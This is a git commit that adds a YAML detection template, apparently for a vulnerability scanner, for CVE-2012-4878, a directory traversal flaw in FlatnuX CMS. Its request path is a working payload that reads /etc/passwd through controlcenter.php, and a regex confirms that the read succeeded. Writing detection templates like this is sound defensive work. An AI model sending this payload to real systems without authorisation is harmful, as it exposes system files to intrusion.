Merge pull request #2202 from daffainfo/patch-109

Create CVE-2012-4878.yaml
patch-1
Prince Chaddha 2021-07-27 10:44:53 +05:30 committed by GitHub
commit aff00f0cd8
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 27 additions and 0 deletions

View File

@ -0,0 +1,27 @@
id: CVE-2012-4878
info:
name: FlatnuX CMS - Directory Traversal
author: daffainfo
severity: high
description: Path traversal vulnerability in controlcenter.php in FlatnuX CMS 2011 08.09.2 allows remote administrators to read arbitrary files via a full pathname in the dir parameter in a contents/Files action.
reference: |
- https://www.exploit-db.com/exploits/37034
- https://www.cvedetails.com/cve/CVE-2012-4878
tags: cve,cve2012,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/controlcenter.php?opt=contents/Files&dir=%2Fetc&ffile=passwd&opmod=open"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200